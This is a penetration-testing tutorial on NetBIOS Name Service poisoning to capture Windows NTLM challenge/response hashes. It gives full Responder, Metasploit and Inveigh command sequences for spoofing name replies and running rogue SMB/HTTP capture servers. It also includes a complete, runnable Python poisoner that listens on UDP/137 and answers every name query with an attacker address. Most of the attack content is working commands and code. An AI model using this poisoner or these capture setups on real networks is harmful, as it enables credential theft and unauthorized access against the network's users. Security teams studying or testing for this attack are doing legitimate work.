NetBIOS Name Service (NBT-NS) is used in Windows networks for name resolution between hosts. A system falls back to it when resolution via the hosts/LMHOSTS files and DNS fails. Abusing this fallback to perform a man-in-the-middle attack is a common tactic used by penetration testers and red teamers to gain an initial foothold inside a network. The captured material is not the user's password hash but the NTLM challenge/response (Net-NTLMv1/v2); it can be cracked offline, or the authentication attempt itself can be relayed to another host to obtain legitimate access without cracking anything.
Responder, written by Laurent Gaffié and released through Trustwave SpiderLabs, implements the NBNS spoofing attack together with rogue authentication servers for SMB, HTTP and other protocols that accept NTLM. The invocation below answers poisoned queries with the address given by -e (useful when the capture servers run on a different host than the poisoner), forces HTTP Basic authentication with -b so that credentials sent over HTTP arrive in cleartext, and prints verbose output. One caveat: -A is analyze mode, in which Responder only logs NBT-NS, LLMNR and Browser requests without answering them, so drop that flag when you actually want to poison.
responder -I eth0 -e 10.0.0.2 -b -A -v
When a host on the network sends a NetBIOS name query broadcast, the attacker's machine sends a forged reply claiming the name, and the victim then attempts to authenticate to the attacker's rogue service with NTLM, handing over its challenge/response hash.
NBNS spoofing can also be implemented with the Metasploit Framework, using capture modules that complete the NTLM negotiation and record the challenge/response for protocols such as SMB and HTTP. For capturing the hash over SMB the following module is used:
use auxiliary/server/capture/smb
set SRVHOST 10.0.0.2
set cainpwfile /tmp/cain-smb
set johnpwfile /tmp/john-smb
set logfile /tmp/logfile
run
The module for capturing the NTLM challenge/response over HTTP can be configured as below:
use auxiliary/server/capture/http_ntlm
set SRVHOST 10.0.0.2
set SRVPORT 80
set URIPATH /
set cainpwfile /tmp/cain-http
set johnpwfile /tmp/john-http
set logfile /tmp/logfile
run
The following module sends spoofed NetBIOS name service responses to hosts that broadcast name queries on the local network. It runs alongside the capture modules above; SPOOFIP must point at the host where those capture servers listen.
use auxiliary/spoof/nbns/nbns_response
set SPOOFIP 10.0.0.2
run
When a user on the network resolves a resource name via NetBIOS broadcast, the client is redirected to the attacker host and the NTLM challenge/response is captured by the listening capture module.
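The exchange described above for Responder and for the Metasploit nbns_response module, as an added example that is not code from the original post nor from any of those tools: a minimal NBT-NS poisoner that parses a broadcast NAME QUERY REQUEST and builds the forged NAME QUERY RESPONSE pointing the name at the attacker's address, following the RFC 1002 packet layout (first-level encoded name, NB record, 6-byte RDATA of NB_FLAGS plus IPv4). The hostname FILESRV01, the transaction ID and the 10.0.0.2 spoof address are assumptions chosen for illustration; run_poisoner needs root and nothing else bound to UDP/137.

```python
# Added example (not from the original post, Responder, Metasploit or Inveigh):
# NBT-NS name-query parser and spoofed-response builder per RFC 1002.
# Names, transaction IDs and the spoof address below are assumptions.
import socket
import struct

NBNS_PORT = 137
QTYPE_NB = 0x0020        # NetBIOS general name service resource record
QCLASS_IN = 0x0001
QUERY_FLAGS = 0x0110     # opcode QUERY, broadcast (B) and recursion desired (RD) set
RESPONSE_FLAGS = 0x8500  # response (R), authoritative answer (AA), RD


def encode_netbios_name(name, suffix=0x20):
    """First-level encoding: 15-char space-padded name + suffix byte, each
    nibble mapped onto 'A'..'P', wrapped in a 0x20 length byte and a 0x00
    terminator (34 bytes total). Suffix 0x20 is the file-server service."""
    raw = name.upper().ljust(15)[:15].encode("ascii") + bytes([suffix])
    nibbles = bytearray()
    for b in raw:
        nibbles.append(0x41 + (b >> 4))
        nibbles.append(0x41 + (b & 0x0F))
    return b"\x20" + bytes(nibbles) + b"\x00"


def decode_netbios_name(encoded):
    """Reverse of encode_netbios_name; returns (name, suffix)."""
    if len(encoded) < 34 or encoded[0] != 0x20 or encoded[33] != 0x00:
        raise ValueError("not a first-level encoded NetBIOS name")
    body = encoded[1:33]
    if any(c < 0x41 or c > 0x50 for c in body):
        raise ValueError("invalid nibble character in encoded name")
    raw = bytes(((body[i] - 0x41) << 4) | (body[i + 1] - 0x41)
                for i in range(0, 32, 2))
    return raw[:15].decode("ascii").rstrip(" "), raw[15]


def build_query(txid, name, suffix=0x20):
    """What a Windows host broadcasts to port 137 when DNS fails (used here
    as constructed sample input; a real victim generates this)."""
    header = struct.pack("!HHHHHH", txid, QUERY_FLAGS, 1, 0, 0, 0)
    question = encode_netbios_name(name, suffix) + struct.pack("!HH", QTYPE_NB, QCLASS_IN)
    return header + question


def parse_query(pkt):
    """Return {'txid', 'name', 'suffix'} for a NAME QUERY REQUEST, else None."""
    if len(pkt) < 50:
        return None
    txid, flags, qdcount, _an, _ns, _ar = struct.unpack("!HHHHHH", pkt[:12])
    if flags & 0x8000:             # R bit set: a response, not a query
        return None
    if (flags >> 11) & 0x0F != 0:  # only opcode 0 (QUERY); skip registration/release
        return None
    if qdcount != 1:
        return None
    qtype, qclass = struct.unpack("!HH", pkt[46:50])
    if qtype != QTYPE_NB or qclass != QCLASS_IN:
        return None
    name, suffix = decode_netbios_name(pkt[12:46])
    return {"txid": txid, "name": name, "suffix": suffix}


def build_response(txid, name, suffix, spoof_ip, ttl=165):
    """NAME QUERY RESPONSE claiming that `name` is reachable at `spoof_ip`."""
    header = struct.pack("!HHHHHH", txid, RESPONSE_FLAGS, 0, 1, 0, 0)
    rr = encode_netbios_name(name, suffix) + struct.pack("!HHIH", QTYPE_NB, QCLASS_IN, ttl, 6)
    rdata = struct.pack("!H", 0x0000) + socket.inet_aton(spoof_ip)  # NB_FLAGS: B-node, unique
    return header + rr + rdata


def handle_packet(pkt, spoof_ip):
    """Poisoner core: answer every valid NAME QUERY with the spoof address."""
    q = parse_query(pkt)
    if q is None:
        return None
    return build_response(q["txid"], q["name"], q["suffix"], spoof_ip)


def run_poisoner(spoof_ip):
    """Listen on UDP/137 and answer broadcast queries (requires root)."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    sock.bind(("0.0.0.0", NBNS_PORT))
    while True:
        pkt, (src_ip, src_port) = sock.recvfrom(1024)
        resp = handle_packet(pkt, spoof_ip)
        if resp:
            sock.sendto(resp, (src_ip, src_port))


if __name__ == "__main__":
    run_poisoner("10.0.0.2")
```

The reply is unicast back to the querying host's source port, which is all a Windows client needs to accept it; the victim then connects to 10.0.0.2 for the requested service and the SMB or HTTP capture server on that host completes the NTLM exchange. Responder's -e option corresponds to the spoof_ip parameter here, and Metasploit's SPOOFIP does the same.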
Kevin Robertson implemented this attack in PowerShell as Inveigh, which runs the poisoner and the capture listeners in memory on a compromised Windows host. The script is bundled in Empire, PoshC2 and other frameworks and can be started as follows:
Invoke-Inveigh -ConsoleOutput Y -NBNS Y -mDNS Y -HTTPS Y -Proxy Y
Inveigh captures the NTLM challenge/response hashes in the same way as Responder and Metasploit; the -NBNS and -mDNS switches select which name-resolution protocols are poisoned, while -HTTPS and -Proxy add HTTPS and proxy authentication capture listeners.